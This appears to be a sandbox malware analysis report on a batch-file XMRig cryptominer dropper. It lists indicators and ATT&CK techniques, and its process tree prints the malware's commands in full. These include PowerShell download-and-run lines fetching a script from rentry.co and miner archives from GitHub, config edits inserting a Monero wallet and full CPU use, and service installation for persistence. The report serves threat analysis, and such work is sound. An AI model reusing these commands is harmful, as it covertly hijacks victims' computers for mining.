xmrig | 4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12

Analysis

max time kernel
28s
max time network
141s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-07-2024 03:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1853421663434.bat
Size

517B
MD5

ac9d73455d58bfa42f81e718b8c8d6b5
SHA1

60040fff333b7bc09b22e5c013f11b8a99555ed3
SHA256

4a084dd6b556a67848483a5763f8d3eebadc0527f804f102f7f944b23b31cb12
SHA512

ad24994554a8e6bb68f5ca80b1c53379f7a577964165f56d2f6bef14340fec3d0f17d14faa2db4651776a83bd5686f26ee59080ee2a16d0468b8d38504e460b2

Score

10^/10

xmrig evasion execution miner

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://rentry.co/regele/raw

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip

Signatures

XMRig Miner payload 16 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\moneroocean\xmrig.exe	family_xmrig
C:\Users\Admin\moneroocean\xmrig.exe	xmrig
behavioral1/memory/4732-131-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-413-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-414-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-415-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-416-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-417-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-418-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-419-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-420-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-421-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-422-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-423-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-424-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig
behavioral1/memory/3912-425-0x0000000000400000-0x000000000102B000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow pid process

2 4516 powershell.exe
5 1788 powershell.exe
7 616 powershell.exe
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002
Executes dropped EXE 9 IoCs

Processes:

xmrig.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exenssm.exexmrig.exe

pid process

4732 xmrig.exe
4220 nssm.exe
3864 nssm.exe
2316 nssm.exe
1728 nssm.exe
508 nssm.exe
392 nssm.exe
4652 nssm.exe
3912 xmrig.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

4 raw.githubusercontent.com
5 raw.githubusercontent.com
7 raw.githubusercontent.com
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

3920 sc.exe
4652 sc.exe
4788 sc.exe
4296 sc.exe

flow	pid	process
2	4516	powershell.exe
5	1788	powershell.exe
7	616	powershell.exe

pid	process
4732	xmrig.exe
4220	nssm.exe
3864	nssm.exe
2316	nssm.exe
1728	nssm.exe
508	nssm.exe
392	nssm.exe
4652	nssm.exe
3912	xmrig.exe

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
7	raw.githubusercontent.com

pid	process
3920	sc.exe
4652	sc.exe
4788	sc.exe
4296	sc.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4644	powershell.exe
2020	powershell.exe
5092	powershell.exe
1788	powershell.exe
1184	powershell.exe
616	powershell.exe
5020	powershell.exe
344	powershell.exe
1768	powershell.exe
200	powershell.exe
4316	powershell.exe
4516	powershell.exe
4824	powershell.exe

Delays execution with timeout.exe 64 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
4764	timeout.exe
3572	timeout.exe
2896	timeout.exe
2372	timeout.exe
820	timeout.exe
3852	timeout.exe
4844	timeout.exe
808	timeout.exe
3904	timeout.exe
3424	timeout.exe
1976	timeout.exe
4636	timeout.exe
1260	timeout.exe
3220	timeout.exe
4228	timeout.exe
1952	timeout.exe
1008	timeout.exe
2452	timeout.exe
1292	timeout.exe
4716	timeout.exe
4112	timeout.exe
820	timeout.exe
996	timeout.exe
1764	timeout.exe
3220	timeout.exe
2800	timeout.exe
2040	timeout.exe
2064	timeout.exe
4472	timeout.exe
4228	timeout.exe
4268	timeout.exe
588	timeout.exe
3856	timeout.exe
2432	timeout.exe
908	timeout.exe
1728	timeout.exe
2908	timeout.exe
2228	timeout.exe
3132	timeout.exe
4372	timeout.exe
1552	timeout.exe
1816	timeout.exe
4232	timeout.exe
3132	timeout.exe
1400	timeout.exe
1692	timeout.exe
808	timeout.exe
4492	timeout.exe
4212	timeout.exe
4880	timeout.exe
1884	timeout.exe
4780	timeout.exe
2732	timeout.exe
4328	timeout.exe
1712	timeout.exe
4716	timeout.exe
1692	timeout.exe
3012	timeout.exe
3032	timeout.exe
4360	timeout.exe
2372	timeout.exe
1476	timeout.exe
2524	timeout.exe
2888	timeout.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3576 taskkill.exe
Runs net.exe

pid	process
3576	taskkill.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4516	powershell.exe
4516	powershell.exe
4516	powershell.exe
1788	powershell.exe
1788	powershell.exe
1788	powershell.exe
4644	powershell.exe
4644	powershell.exe
4644	powershell.exe
5020	powershell.exe
5020	powershell.exe
5020	powershell.exe
344	powershell.exe
344	powershell.exe
344	powershell.exe
2020	powershell.exe
2020	powershell.exe
2020	powershell.exe
4824	powershell.exe
4824	powershell.exe
4824	powershell.exe
1768	powershell.exe
1768	powershell.exe
1768	powershell.exe
5092	powershell.exe
5092	powershell.exe
5092	powershell.exe
1184	powershell.exe
1184	powershell.exe
1184	powershell.exe
200	powershell.exe
200	powershell.exe
200	powershell.exe
616	powershell.exe
616	powershell.exe
616	powershell.exe
4316	powershell.exe
4316	powershell.exe
4316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexmrig.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	3576	taskkill.exe
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	4644	powershell.exe
Token: SeDebugPrivilege	5020	powershell.exe
Token: SeDebugPrivilege	344	powershell.exe
Token: SeDebugPrivilege	2020	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	1768	powershell.exe
Token: SeDebugPrivilege	5092	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	200	powershell.exe
Token: SeDebugPrivilege	616	powershell.exe
Token: SeDebugPrivilege	4316	powershell.exe
Token: SeLockMemoryPrivilege	3912	xmrig.exe
Token: SeIncreaseQuotaPrivilege	4496	WMIC.exe
Token: SeSecurityPrivilege	4496	WMIC.exe
Token: SeTakeOwnershipPrivilege	4496	WMIC.exe
Token: SeLoadDriverPrivilege	4496	WMIC.exe
Token: SeSystemProfilePrivilege	4496	WMIC.exe
Token: SeSystemtimePrivilege	4496	WMIC.exe
Token: SeProfSingleProcessPrivilege	4496	WMIC.exe
Token: SeIncBasePriorityPrivilege	4496	WMIC.exe
Token: SeCreatePagefilePrivilege	4496	WMIC.exe
Token: SeBackupPrivilege	4496	WMIC.exe
Token: SeRestorePrivilege	4496	WMIC.exe
Token: SeShutdownPrivilege	4496	WMIC.exe
Token: SeDebugPrivilege	4496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4496	WMIC.exe
Token: SeRemoteShutdownPrivilege	4496	WMIC.exe
Token: SeUndockPrivilege	4496	WMIC.exe
Token: SeManageVolumePrivilege	4496	WMIC.exe
Token: 33	4496	WMIC.exe
Token: 34	4496	WMIC.exe
Token: 35	4496	WMIC.exe
Token: 36	4496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4496	WMIC.exe
Token: SeSecurityPrivilege	4496	WMIC.exe
Token: SeTakeOwnershipPrivilege	4496	WMIC.exe
Token: SeLoadDriverPrivilege	4496	WMIC.exe
Token: SeSystemProfilePrivilege	4496	WMIC.exe
Token: SeSystemtimePrivilege	4496	WMIC.exe
Token: SeProfSingleProcessPrivilege	4496	WMIC.exe
Token: SeIncBasePriorityPrivilege	4496	WMIC.exe
Token: SeCreatePagefilePrivilege	4496	WMIC.exe
Token: SeBackupPrivilege	4496	WMIC.exe
Token: SeRestorePrivilege	4496	WMIC.exe
Token: SeShutdownPrivilege	4496	WMIC.exe
Token: SeDebugPrivilege	4496	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4496	WMIC.exe
Token: SeRemoteShutdownPrivilege	4496	WMIC.exe
Token: SeUndockPrivilege	4496	WMIC.exe
Token: SeManageVolumePrivilege	4496	WMIC.exe
Token: 33	4496	WMIC.exe
Token: 34	4496	WMIC.exe
Token: 35	4496	WMIC.exe
Token: 36	4496	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4808	WMIC.exe
Token: SeSecurityPrivilege	4808	WMIC.exe
Token: SeTakeOwnershipPrivilege	4808	WMIC.exe
Token: SeLoadDriverPrivilege	4808	WMIC.exe
Token: SeSystemProfilePrivilege	4808	WMIC.exe
Token: SeSystemtimePrivilege	4808	WMIC.exe
Token: SeProfSingleProcessPrivilege	4808	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

xmrig.exe

pid process

3912 xmrig.exe

pid	process
3912	xmrig.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exepowershell.execmd.exenet.execmd.exepowershell.exe

description	pid	process	target process
PID 220 wrote to memory of 4516	220	cmd.exe	powershell.exe
PID 220 wrote to memory of 4516	220	cmd.exe	powershell.exe
PID 4516 wrote to memory of 3420	4516	powershell.exe	cmd.exe
PID 4516 wrote to memory of 3420	4516	powershell.exe	cmd.exe
PID 3420 wrote to memory of 4696	3420	cmd.exe	net.exe
PID 3420 wrote to memory of 4696	3420	cmd.exe	net.exe
PID 4696 wrote to memory of 3904	4696	net.exe	net1.exe
PID 4696 wrote to memory of 3904	4696	net.exe	net1.exe
PID 3420 wrote to memory of 4796	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 4796	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 3864	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 3864	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 4832	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 4832	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 404	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 404	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 2984	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 2984	3420	cmd.exe	where.exe
PID 3420 wrote to memory of 3920	3420	cmd.exe	sc.exe
PID 3420 wrote to memory of 3920	3420	cmd.exe	sc.exe
PID 3420 wrote to memory of 4652	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 4652	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 3576	3420	cmd.exe	taskkill.exe
PID 3420 wrote to memory of 3576	3420	cmd.exe	taskkill.exe
PID 3420 wrote to memory of 1788	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 1788	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4644	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4644	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 5020	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 5020	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4732	3420	cmd.exe	xmrig.exe
PID 3420 wrote to memory of 4732	3420	cmd.exe	xmrig.exe
PID 3420 wrote to memory of 1500	3420	cmd.exe	cmd.exe
PID 3420 wrote to memory of 1500	3420	cmd.exe	cmd.exe
PID 1500 wrote to memory of 344	1500	cmd.exe	powershell.exe
PID 1500 wrote to memory of 344	1500	cmd.exe	powershell.exe
PID 344 wrote to memory of 4372	344	powershell.exe	HOSTNAME.EXE
PID 344 wrote to memory of 4372	344	powershell.exe	HOSTNAME.EXE
PID 3420 wrote to memory of 2020	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 2020	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4824	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4824	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 1768	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 1768	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 5092	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 5092	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 1184	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 1184	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 200	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 200	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 616	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 616	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4316	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4316	3420	cmd.exe	powershell.exe
PID 3420 wrote to memory of 4788	3420	cmd.exe	sc.exe
PID 3420 wrote to memory of 4788	3420	cmd.exe	sc.exe
PID 3420 wrote to memory of 4296	3420	cmd.exe	sc.exe
PID 3420 wrote to memory of 4296	3420	cmd.exe	sc.exe
PID 3420 wrote to memory of 4220	3420	cmd.exe	cmd.exe
PID 3420 wrote to memory of 4220	3420	cmd.exe	cmd.exe
PID 3420 wrote to memory of 3864	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 3864	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 2316	3420	cmd.exe	nssm.exe
PID 3420 wrote to memory of 2316	3420	cmd.exe	nssm.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\1853421663434.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://rentry.co/regele/raw', $tempfile); & $tempfile 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL; Remove-Item -Force $tempfile"
2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4516

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp7A70.tmp.bat" 42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL"
3⤵
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\system32\net.exe
net session
4⤵
- Suspicious use of WriteProcessMemory
PID:4696

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
5⤵
PID:3904

C:\Windows\system32\where.exe
where powershell
4⤵
PID:4796

C:\Windows\system32\where.exe
where find
4⤵
PID:3864

C:\Windows\system32\where.exe
where findstr
4⤵
PID:4832

C:\Windows\system32\where.exe
where tasklist
4⤵
PID:404

C:\Windows\system32\where.exe
where sc
4⤵
PID:2984

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:3920

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:4652

C:\Windows\system32\taskkill.exe
taskkill /f /t /im xmrig.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3576

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/xmrig.zip', 'C:\Users\Admin\xmrig.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1788

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\xmrig.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4644

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"donate-level\": *\d*,', '\"donate-level\": 1,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5020

C:\Users\Admin\moneroocean\xmrig.exe
"C:\Users\Admin\moneroocean\xmrig.exe" --help
4⤵
- Executes dropped EXE
PID:4732

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
4⤵
- Suspicious use of WriteProcessMemory
PID:1500

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "hostname | %{$_ -replace '[^a-zA-Z0-9]+', '_'}"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\system32\HOSTNAME.EXE
"C:\Windows\system32\HOSTNAME.EXE"
6⤵
PID:4372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"url\": *\".*\",', '\"url\": \"gulf.moneroocean.stream:10004 \",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"user\": *\".*\",', '\"user\": \"42cRnHwcKM6bmza8jmWyvWB2tjAcxQGmJ1QHhJ9ae55qRx488q6cvAU42EKkEiEd2N9TE1UjNViUSNVqV1NJ17R79fDhjVL\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"pass\": *\".*\",', '\"pass\": \"Ndtnzvhn\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"max-cpu-usage\": *\d*,', '\"max-cpu-usage\": 100,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config.json' | %{$_ -replace '\"log-file\": *null,', '\"log-file\": \"C:\\Users\\Admin\\moneroocean\\xmrig.log\",'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$out = cat 'C:\Users\Admin\moneroocean\config_background.json' | %{$_ -replace '\"background\": *false,', '\"background\": true,'} | Out-String; $out | Out-File -Encoding ASCII 'C:\Users\Admin\moneroocean\config_background.json'"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/nssm.zip', 'C:\Users\Admin\nssm.zip')"
4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:616

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:\Users\Admin\nssm.zip', 'C:\Users\Admin\moneroocean')"
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4316

C:\Windows\system32\sc.exe
sc stop moneroocean_miner
4⤵
- Launches sc.exe
PID:4788

C:\Windows\system32\sc.exe
sc delete moneroocean_miner
4⤵
- Launches sc.exe
PID:4296

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" install moneroocean_miner "C:\Users\Admin\moneroocean\xmrig.exe"
4⤵
- Executes dropped EXE
PID:4220

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppDirectory "C:\Users\Admin\moneroocean"
4⤵
- Executes dropped EXE
PID:3864

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppPriority BELOW_NORMAL_PRIORITY_CLASS
4⤵
- Executes dropped EXE
PID:2316

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStdout "C:\Users\Admin\moneroocean\stdout"
4⤵
- Executes dropped EXE
PID:1728

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" set moneroocean_miner AppStderr "C:\Users\Admin\moneroocean\stderr"
4⤵
- Executes dropped EXE
PID:508

C:\Users\Admin\moneroocean\nssm.exe
"C:\Users\Admin\moneroocean\nssm.exe" start moneroocean_miner
4⤵
- Executes dropped EXE
PID:392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:5072

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4496

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4716

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:868

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4808

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:820

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:1912

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:684

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1008

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4656

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3052

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:916

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3276

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:992

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3136

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1692

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:3884

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:3868

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:3424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4344

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:816

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4772

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4704

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2948

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:4572

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:1884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:4376

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:656

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:204

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1952

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2540

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1292

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:4636

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
2⤵
PID:2528

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get loadpercentage
3⤵
PID:1552

C:\Windows\system32\timeout.exe
timeout /t 1
2⤵
- Delays execution with timeout.exe
PID:2040

